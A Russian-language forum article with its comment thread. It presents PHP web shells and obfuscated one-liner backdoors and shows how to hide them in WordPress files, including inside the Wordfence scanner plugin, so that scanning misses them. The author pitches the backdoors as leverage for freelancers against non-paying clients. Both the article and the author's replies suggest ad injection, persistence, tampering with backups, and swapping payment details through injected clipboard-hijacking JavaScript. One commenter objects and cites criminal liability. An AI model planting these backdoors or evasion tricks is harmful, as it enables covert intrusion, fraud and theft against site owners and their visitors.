• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Несколько вариантов PHP backdoor, или Wordpress и самый популярный плагин для поиска malware.

Статус
Закрыто для дальнейших ответов.
Содержание:

  • Предисловие
  • Введение
  • Популярный плагин для поиска malware
  • Популярные web "backdoor"
  • Примеры "backdoor" которые не определяются
  • Заключение


Предисловие

Приветствую читателей Codeby.net!
В статье @r0hack привёл пример как фрилансер может подстраховаться от недобросовестного заказчика оставив для себя небольшой backdoor( открытую дверцу...) в коде продукта разработанного на заказ.
Приведённый вариант используется только как пример, ведь такую закладку легко обнаружит стандартный антивирусный сканер, даже стационарный AVG при открытие страницы со статьёй начинает ругаться:

0.png


Что говорить уж о специально заточенных продуктах под "web backdoor", конечно такой код будет сразу же выявлен и обезврежен.

В этой статье рассмотрим варианты "backdoor" которые будет сложнее обнаружить антивирусным сканером, тем не менее это возможно.

Подобные "дверцы" помогут вернуть свои деньги, пусть хотя бы частично.
Ведь имея доступ к исходному коду необязательно его удалять, есть возможность не много подправить, вшить рекламу которая будет приносить небольшой доход, добавить необходимый материал который обличит недобросовестного хозяина, думаю в этом ключе можно многое придумать.


Введение


С выходом PHP 7, часть "web backdoor" отказались работать, даже обнаружили себя осыпав ошибками.Код который не смог обнаружить ни один специализированный антивирусный сканер, выявил сам себя при смене версии PHP.
Конечно альтернативных вариантов осталось достаточно, несколько из которых и будут приведены в статье.
В качестве лаборатории будет взята как наиболее популярная CMS Wordpress( , , ), в качестве сканера malware выбран самый популярный плагин.


Популярный плагин для поиска malware


В панели управления CMS нажав на кнопку "Добавить новый" (плагин) открывается страница с доступными к установке плагинами, нажав на кнопку "Рекомендуемые" и вбив в поисковой строке ключевое слов "malware", видим самый популярный плагин " "

1.png


"Более 3 миллионов активных установок" и самая большая оценка среди остальных, это и будет сигнал для теста.
Установив, сразу запустим сканер и убедимся в его "работоспособности" запустив первое сканирование....

2.png


Учитывая что CMS только что установлена, так сказать только из печи и не имеет ни одной лишней строчки ( за исключением нового плагина), результат сканирования отрицательный.


Популярные web "backdoor"

В качестве эксперимента добавим однострочный backdoor:

PHP:
<?php echo shell_exec($_GET['cmd']); ?>

В код нескольких файлов, в том числе файла index.php, для полноты закинем отдельный скрипт с этим же backdoor в корень сайта.


3.png



Проверим работоспособность:

4.png


5.png


Теперь снова запустим сканирование:

6.png


Учитывая тот момент что плагин установлен до того как backdoor был вшит и сканирование уже было, у плагина есть с чем сравнивать модифицированные файлы, так сказать это некоторая фора для плагина.
Плагин обнаружил модификацию, так же обнаружил зловредный код в файле index.php.

Вроде сканер работает...
Пойдём дальше и закинем в корневую директорию сайта файлы с наиболее популярными однострочными backdoor.

7.png


Плагин без труда обнаружил закладки, всего обнаружил 11 вариантов backdoor ( на скрине 12 только потому что файл из первого теста не был удалён.) из более чем 25-ти.

8.png


Вот список функций которые выявил плагин:

PHP:
assert();
eval($_GET["cmd"]);
exec();
passthru();
pcntl_exec();
preg_replace();
preg_replace_callback();
shell_exec();
system();

Эти функции так же обнаруживаются многими WAF при атаках на web приложения эксплуатируя уязвимости RCE.


Примеры "backdoor" которые не определяются


Рассмотрим простейшие варианты из наиболее популярных однострочных backdoor, которые не смог выявить установленный плагин, приведу лишь несколько вариантов, на самом деле таких однострочников гораздо больше(к ).

Внедрим один из вариантов backdoor в тело самого плагина, файл "wp-content/plugins/wordfence/wordfence.php":

PHP:
<?php
if (!isset($_GET['cmd']) && !isset($_GET['arg'])  ){
// body file
}else{
    $a=$_REQUEST['cmd'];
$b=$_REQUEST['arg'];
   register_shutdown_function(create_function('', "$a($b);"));
}

Таким образом всё будет работать ( в том числе и сканирование), а при правильном обращение к скрипту будут выполняться необходимые команды:

9.png


Так же добавим иные варианты в другие файлы:

PHP:
if (isset($_REQUEST['cmd'])){
     $h= popen($_REQUEST['cmd'],'r');
   
      while ($s = fgets($h)) { //fread($h,1024)
    echo $s;
   }
   pclose($h);
}

PHP:
<?php
if (!isset($_GET['cmd']) && !isset($_GET['arg'])  ){
// body file
}else{
//.php?cmd=system&arg=whoami
  array_map($_REQUEST['cmd'], array($_REQUEST['arg']));
}

В отдельный файл, так же прям в корневую директорию закинем такой backdoor:

PHP:
<?php
//extract.php?a=system&b=whoami
   extract($_REQUEST);
   $a($b);
?>

Запустим сканирование и посмотрим на результат:

10.png



Как видим была выявлена только модификация двух файлов, только файлов самой cms, файл самого плагина не дал положительного результата, но он имеет вшитый backdoor.
Более того в обнаруженных модифицированных файлах не обнаружено ни какого зловредного кода:

11.png




Заключение

Учитывая тот момент что ваш код не будет сканирован на модификации, так как не с чем будет сравнивать, то скрыть кусок кода для открытие дверцы в своих исходника будет совсем не сложно.
Ведь это ваш код, вы сами его писали и прекрасно понимаете в какой части можно вставить кусочек который не будет ни чем мешать и не будет привлекать особого внимания, а так как можно обойтись одной строчкой, то вообще с этим не будет проблем.

В случае если необходимо будет оставить backdoor вне вашего кода, подойдёт любая директория CMS.
Если необходимо инфицировать файл который уже существует на сайте, то можно попробовать инфицировать файл плагина который сканирует на присутствие malware в файлах сайта.

В заключение добавлю ещё один вариант однострочного backdoor который не способен определить ни один сканер:
PHP:
<?=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);
//.php?_=system&__=whoami

Не работает на php7.

P.S. К чему всё это?....
Скорей всего к вот этому сообщению, точнее наверное ответ участнику @m0ze.
Дают лишь направление, подсказывают идею, в некоторых случаях дают информацию которая способствует реализации этих идей, остальное дело за вами.
Тем более если вы разработчик, то техника реализации не должна вас затруднить.
Повторюсь, необязательно всё крушить, возможно и скрыто вшить свою рекламу которая будет приносить (пусть не большой) доход, заменить уже имеющеюся на свою(это как вариант).
Имея подобную дверцу вы можете закрепиться в системе, заменить уже имеющиеся backup файлы, получить доступ не только к сайту в котором вшит этот backdoor, можете управлять содержимым сайта в своих целях.
 
Последнее редактирование:

non_logs

Green Team
29.12.2016
144
79
BIT
0
Скорее всего создатель этого плагина сейчас плюет в экран и пытается убрать этот недостаток ))
 
  • Нравится
Реакции: RinGinO
M

m0ze

Если автор копипасты "Оставляем бэкдор для страховки..." написал всё то в самом начале своего пути в ИБ, то не совсем понятно, почему некоторых так задели за живое вполне закономерные вопросы. Их [вопросы] можно было бы перечеркнуть махом, ответив "я был новичком, написал что мог тогда" и всё, любое иное обсуждение потеряло бы всякий смысл. Но тут получается ситуация другая уже, и мы опять возвращаемся к теме вопросов.

1 - для кого написан материал? Для новичков, как в случае с "Оставляем бэкдор для страховки..."? Почему тогда не в соответствующем разделе форума?

2 -
Подобные "дверцы" помогут вернуть свои деньги, пусть хотя бы частично.
Как именно? Конкретно, без абстракции и гипотетических ситуаций.

3 -
Ведь имея доступ к исходному коду необязательно его удалять, есть возможность не много подправить, вшить рекламу которая будет приносить небольшой доход, добавить необходимый материал который обличит недобросовестного хозяина, думаю в этом ключе можно многое придумать.
Если это ответ на вопрос №2, тогда вопросы такие:
- вшить рекламу на новый сайт без рейтинга/веса в ПС? Допустим, рекламу вы всё же внедрили, отбросим детали. Как думаете, сколь долго она провисит на этом сайте? Время реагирования потенциального кидалы на инцидент?
- "добавить необходимый материал который обличит недобросовестного хозяина" - на новом сайте? Увидит 1 человек и что? Ничего. Вопросы из предыдущего пункта повторяются и тут;
- в этом ключе лучше не придумывать ничего. Почему? Отвечу позже.

4 -
Внедрим один из вариантов backdoor в тело самого плагина, файл "wp-content/plugins/wordfence/wordfence.php"
Актуально только для личных тестов/демо площадки. В "бою" есть 2 основные причины, почему это сценарий не сработает. Я, кстати, упомянул один из них в своём комментарии, на который вы сослались, но вы эту же ошибку потянули и в свой материал. Относится и к этим утверждениям тоже:
В случае если необходимо будет оставить backdoor вне вашего кода, подойдёт любая директория CMS.
Если необходимо инфицировать файл который уже существует на сайте, то можно попробовать инфицировать файл плагина который сканирует на присутствие malware в файлах сайта.

5 -
Дают лишь направление, подсказывают идею, в некоторых случаях дают информацию которая способствует реализации этих идей, остальное дело за вами. Тем более если вы разработчик, то техника реализации не должна вас затруднить.
Так для кого материал всё же? Для новичков (в ИБ?), как говорилось ранее, или для опытных разработчиков? Пока что получается, что всё в одну кучу свалено и нет чёткого представления для кого пишутся такие материалы. Да и, опять же, я уже говорил, что таким образом мысли вы подтолкнёте к пропасти, а не к успеху.

6 -
Имея подобную дверцу вы можете закрепиться в системе, заменить уже имеющиеся backup файлы, получить доступ не только к сайту в котором вшит этот backdoor, можете управлять содержимым сайта в своих целях.
Все эти потуги ради чего? Задетое самолюбие с желанием поднасрать в ответ? Опять же, вопрос о том, для кого написана статья, актуален.

7 -
P.S. К чему всё это?....
Скорей всего к вот этому сообщению, точнее наверное ответ участнику @m0ze.
Ключевой момент. К чему всё это? Попытка заступиться за коллегу? Так никто не нападал. Я специально не стал поддерживать дальнейшее общение в тех темах, т.к. всё давно предельно ясно, а демагогия и прочая болтовня у меня интереса не вызывают. Мои вопросы можно было перечеркнуть всего одной фразой в духе "я тогда только начинал, хотелось с коллегами поделиться своим начальным опытом", но вместо этого началось размазывание по столу. Вроде проехали, все всё поняли кому что нужно было, но тут новый "привет" прилетает, и опять те же косяки, и опять те же вопросы. Странно как-то.

Собственно, пара мыслей на тему фриланса/кидалова и задетого самолюбия:
1 - вы ввязались в авантюру с неадекватом, помните об этом всегда. Он на своём поле, вы - нет. то есть вы сами себя ставите в позицию жертвы, а вот такими статьями можете себя под удар поставить ещё сильнее. Без договора нет разговора, как говорили в 90-е. Иными словами, на фрилансе, особенно новички, никак себя юридически не защищают, поэтому "кинуть" их легче лёгкого, особенно когда без предоплаты совершаются какие-либо действия. Что лучше всего сделать, чтобы себя обезопасить? Иметь свой сервер и свой домен для работы и демонстрации работы заказчику. Решение стоит копейки, бережёт вашу интеллектуальную собственность и не даёт контроля заказчику над вами. Также не ставит вас в идиотское положение с внедрением в свой же код какого-то говна, что за собой может повлечь 272 статью УК РФ, например, не говоря про банальную потерю времени на всю эту возню с закладками, профита от которой ноль, если быть откровенными. Какой-то конкретики никто не назвал ни тогда, ни сейчас, а статьи есть, и люди их читают и думают, что так и надо. Учите собственной безопасности в первую очередь, если берётесь учить, а не глупостям.
2 - учитесь на таких вот ситуациях признавать свои ошибки. Да-да, это именно ваши ошибки, что вас кидают. И ничьи больше. Вместо задетого эго лучше подумайте над тем, как и в каком порядке вы работаете, если это даёт такие потери. Вносите корректировки, пробуйте варианты, но не связывайтесь с дураками (особенно если вы уже понесли потери и находитесь в заведомо неадекватном состоянии).

Всем мир.
 
M

m0ze

WebWare Team, окей, перефразирую: "Если автор материала..", только сути это не меняет.
 

centr

Green Team
31.01.2017
408
475
BIT
0
1 - для кого написан материал?

Для людей, в первую очередь разумеется для новичков в сфере иб, кому то пригодится только код.
Здесь только идея, идея для того кто подрабатывал фрилансом и думал как можно оставить для себя дверцу, что он будет делать с ней не важно.

Как именно? Конкретно, без абстракции и гипотетических ситуаций.

Мне знакомо несколько вариантов, разглашать всё, просто не вправе.
Приводить конкретные примеры, без гипотетических ситуаций, все равно что написать чистосердечное.
Без абстракций и гипотетических примеров здесь не обойтись!

Чисто гипотетический пример:

На странице имеются реквизиты для проведение платежей, не важно какие услуги оказывает хозяин.

- в этом ключе лучше не придумывать ничего.
Подмена реквизитов(внедрить свой javascript который будет отслеживать выделение и отдавать в буфер обмена необходимые строки, или же грубо сменить реквизиты на свои ни чего не выдумывая), вариант лучше рекламы?

Есть ещё несколько вариантов, но о них не буду ни чего говорить, если вы не можете ни чего лучшего придумать, это не означает что ни кто больше ни чего не придумает(придумал).
Актуально только для личных тестов/демо площадки.
Здесь вы ошибайтесь!
Получили мы доступ, что нам мешает отредактировать этот "wp-content/plugins/wordfence/wordfence.php", или какой другой файл?
Что мешает скачать бэкап и подправить так как этого хочется, а потом залить обратно?

Именно в бою проверена правка файлов различных плагинов WAF и сканеров malware, работает.

Учитывая те моменты, что можно всё делать скрыто и не вызывать ни каких подозрений, то и откаты маловероятны(в том случае, если не хватило что бы добраться до бэкапа и поправить его).

Как думаете, сколь долго она провисит на этом сайте? Время реагирования...
Зависит от ваших действий, повторяю - всё можно делать скрыто, если имеется реклама на сайте, почему нельзя заменить её на свою?
Думаю всем ясно, если на сайте реклама висит на тему пищевых добавок, то не следует менять её на рекламу порно.

Если нет рекламы на сайте, можно обойтись и без неё, каждый случай по своему уникален и подход разный.

Все эти потуги ради чего? Задетое самолюбие с желанием поднасрать в ответ?
Если у вас вертится только "поднасрать", не думайте что другие думают так же, школьники имея доступ к контенту на чужом сайте умеют зарабатывать и ни как себя не выдавать.
К чему всё это? Попытка заступиться за коллегу?

Это моё личное мнение, нет не попытка за кого то заступится, а всего лишь попытка донести мысль, что идея дана для того что бы её развивать.
Если вы не можете её развить, то попросите что бы вам помогли и возможно вам накидают варианты.

Дальнейшая дискуссия бесполезна, только трата времени и не более того...
 
  • Нравится
Реакции: borodatych и id2746

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Что лучше всего сделать, чтобы себя обезопасить? Иметь свой сервер и свой домен для работы и демонстрации работы заказчику. Решение стоит копейки, бережёт вашу интеллектуальную собственность и не даёт контроля заказчику над вами.
Причём домен не обязательно.

Ну кстати да, это защитит сильнее чем бэкдор. К тому же если бы все фрилансеры внедряли бэккод был бы треш )
 
  • Нравится
Реакции: 1 человек

pp11

Green Team
16.09.2018
201
82
BIT
0
А ведь @m0ze тоже в чем то прав. Мне кажется дрючиться с этими бэкдорами смысла нет, если можно поставить для демонстрации заказчику все на свой сервер.
Но с другой стороны про бэкдоры тоже полезно знать. К примеру, заказчик хочет протестировать все на своем сервере. Не отказывать же, но надо подстраховать себя.
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
А ведь @m0ze тоже в чем то прав. Мне кажется дрючиться с этими бэкдорами смысла нет, если можно поставить для демонстрации заказчику все на свой сервер.
Но с другой стороны про бэкдоры тоже полезно знать. К примеру, заказчик хочет протестировать все на своем сервере. Не отказывать же, но надо подстраховать себя.
именно отказывать
 
  • Нравится
Реакции: 1 человек

centr

Green Team
31.01.2017
408
475
BIT
0
А ведь @m0ze тоже в чем то прав. Мне кажется дрючиться с этими бэкдорами смысла нет, если можно поставить для демонстрации заказчику все на свой сервер.
Но с другой стороны про бэкдоры тоже полезно знать. К примеру, заказчик хочет протестировать все на своем сервере. Не отказывать же, но надо подстраховать себя.
Бесспорно, прав в том как лучше всего поступить для фрилансера, но альтернативный вариант имеет право быть(пусть и не именно этот).

Тут имеет ценность по большей части код, по крайней мере именно для новичков будут ценны функции php eval, на которые не реагирует большинство WAF и не важно как их использовать.
 
M

m0ze

Глюк, а кто-то спорит? Но при всём при этом, если вы код:
PHP:
if ( isset( $_REQUEST['cmd'] ) ) {
    echo '<h1>' . 'Будьте честными!' . '</h1>';
    echo '<pre>';
    $cmd = ( $_REQUEST['cmd'] );
    system( $cmd );
    echo '</pre>';
}
воспринимаете как уникальный, то говорить дальше не о чём. Авторская строчка echo '<h1>' . 'Будьте честными!' . '</h1>'; не считается, это вообще за гранью добра и зла. Далее текст пляшет вокруг однострочника, которому почти два десятка лет. Вот об этом как бы речь, поэтому как бы и "копипаста".

centr, далее смысла что-то мусолить нет, у вас по ответам видно, что всё в кашу. Я так понимаю, все эти статьи пишутся для поднятия рейтинга, т.к. смысловая нагрузка и обсуждение опять ушли на задний план. Поясню только, что у меня к такому подходу претензий нет, если уж тут так заведено. Просто если бы я этот нюанс знал, то что-то писать вообще бы не стал.

mrOkey, да, иногда можно и без домена даже, суть вы поняли) Хотя с тем же доменом можно и заодно портфолио себе сделать, что только улучшит позиции фрилансера. Собственно, благодаря вот таким вот статьям трэша становится только больше, не считая даже говнокода, который можно наблюдать в подавляющем большинстве случаев. Отчасти это тоже послужило стимулом всё же озвучить часть вопросов по описанной методичке "возвращения себе денег".

Pazsh, тут кому что важнее и кто на каком уровне развития находится как профессионал в той или иной сфере. Кто-то хочет (да, именно хочет) всей этой возни, "Преступления и наказания", тот будет создавать ситуации, запускающие эту цепочку событий с кидаловом, бэкдорами и прочей фигнёй. Опять же, я изложил тезисно мысль касательно "за" и "против", но фокус внимания всё равно на "бэкдорах" и "похекать!11", что говорит само за себя. Людям не интересно напрягать извилины, работать над собой и развиваться. Хочется срачей, разборок, чувства превосходства и прочих отклонений от нормы. Каждому своё. Далее пример:

К примеру, заказчик хочет протестировать все на своем сервере.
А вы хотите получить половину оплаты (если не взяли её с самого начала). Далее уже выбор: либо вы всё равно сами находите способ снять штаны и встать в позу, либо вы держите адекватную линию и не даёте себя нагреть.
Не отказывать же, но надо подстраховать себя.
Сценарий жертвы в действии. Почему бы не отказать, когда явно навязываются неудобные и рисковые условия? Повторю мысль: кидалы - ребята опытные, многие отвалятся ещё на стадии "я покажу результат на своём сервере, после чего вы переведёте часть оплаты" или что-то в этом духе. Логика проста: возиться и пытаться кинуть того, кто перестраховывается - геморрой, кидалы такое не любят.

centr, а альтернативный ли он? Если даже и так, то зачем вам такая альтернатива игрищ с неадекватами, когда вы дополнительно себя подставляете?

...и не важно как их использовать.
Как раз таки контекст имеет принципиальное значение, иначе зачем было вам уже новый материал с тестом дефолтных настроек плагина ставить в рамки ситуации, описанной в той статье? Получается, что притянули за уши, если не важно где/что/когда. А из-за перенятой ситуации "фрилансер и кидала" вы и ошибки из той статьи перетащили уже в свой материал.

А если забыть про контекст фриланса и поговорить про методы защиты того же WordPress'а, то интересные нюансы того же Wordfence почему-то тут не упомянуты)
 

Глюк

Red Team
03.01.2018
1 184
1 877
BIT
110
если вы код: воспринимаете как уникальный, то говорить дальше не о чём.
а я разве что то говорил о коде? )
Далее текст пляшет вокруг однострочника, которому почти два десятка лет. Вот об этом как бы речь, поэтому как бы и "копипаста".
ну тогда все ваши тексты и тут, и вообще в любом месте, простая копипаста. поскольку всем написанным вами словам, как минимум, не одна тысяча лет. с этим вы спорить, надеюсь, не будете... )))))
Хочется срачей, разборок, чувства превосходства и прочих отклонений от нормы. Каждому своё.
))))) чем собственно вы и заняты... )))) извините если что то не так сказал, но вместо того, что бы разводить срач, разборки, и прочие отклонения от нормы, привели бы в пример свою статью по данной тематике. а то, простите, ваши слова выглядят как пустое ведро. звона много, а содержания ноль...
пожалуйста, не воспринимайте мой комент как обиду или ещё что то в этом роде. я то же учусь, и хочу во многом разобраться. и ваша статья, как специалиста, принесла бы намного больше пользы, чем все ваши слова критики других авторов.
 
Последнее редактирование:

centr

Green Team
31.01.2017
408
475
BIT
0
... у вас по ответам видно, что всё в кашу...
В голове мысли совершенно о другом, вот и получается здесь начал, там начал и т.д.
По поводу репутации, вы совершенно неправы, у меня регистрация с 2017 года, посмотрите на количество постов, за 2 года можно было настругать в разы больше сообщений в погоне за репутацией.


Соглашась с содержанием сообщения выше, если вы можете сделать лучше, или вообще можете, то сделайте.
 
M

m0ze

а я разве что то говорил о коде? )
А вы, типа, не заметили, да, что изначальная статья основана как бы именно на этом коде? В том и прикол, что вы говорите о чём угодно, только не о сути вопроса)

ну тогда все ваши тексты и тут, и вообще в любом месте, простая копипаста. поскольку всем написанным вами словам, как минимум, не одна тысяча лет. с этим вы спорить, надеюсь, не будете... )))))
Мда, демагогия as is.

вместо того, что бы разводить срач, разборки, и прочие отклонения от нормы, привели бы в пример свою статью по данной тематике
Ещё разок для танкистов повторю: я задал вопросы касательно статьи. Ту тему замяли, ибо бесполезно что-то выяснять и спрашивать. Написан откровенный бред ради поднятия кармы, кому-то это нравится, все счастливы. Проехали. Появилась новая статья как бы в ответ на мои вопросы. Далее, если понимаете суть прочитанного, текст обсуждения перед вами. Ещё разок: я задал вопросы и привёл аргументы, но акцент некоторыми участниками "обсуждения" был сделан на болтологии и отсебятине. Так понятнее? А в качестве десерта заметим, что последнее предложение:

А если забыть про контекст фриланса и поговорить про методы защиты того же WordPress'а, то интересные нюансы того же Wordfence почему-то тут не упомянуты)

ни у автора, ни у вас интереса не вызвало. Так кто на самом деле устраивает разборки под лозунгами "спервадобейся" и "сделайсам"?
 

Глюк

Red Team
03.01.2018
1 184
1 877
BIT
110
Мда, демагогия as is.
м-да, демагогия ))))))
) вам неоднократно предлагали изложить свою точку зрения в хорошей статье. но вы предпочли иной метод.... )))) ну и кто тут демагог??? ))))
) ещё раз извините если задел вас. но хейт нынче не в моде... )
 
M

m0ze

Глюк, то есть я как бы не могу в комментариях к уже написанной статье задавать вопросы и выражать свою точку зрения и как бы должен написать свою статью "с блэкджеком и шлюхами"?)
Не переживайте, вы меня не задели.
 

Глюк

Red Team
03.01.2018
1 184
1 877
BIT
110
то есть я как бы не могу в комментариях к уже написанной статье задавать вопросы и выражать свою точку зрения и как бы должен написать свою статью
простите, но ваши комментарии не похожи на вопросы и выражения точки зрения. по крайней мере я воспринял их как "вы все бестолковые а я воздушный шарик". поэтому и предложил вам свою точку зрения описать в статье а не в срачах под чужой статьёй. я плохо разбираюсь в этой теме, поэтому мне интересней было бы прочитать адекватный, структурированный материал от вас как от специалиста. впрочем вам решать что делать... )
 
Статус
Закрыто для дальнейших ответов.
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!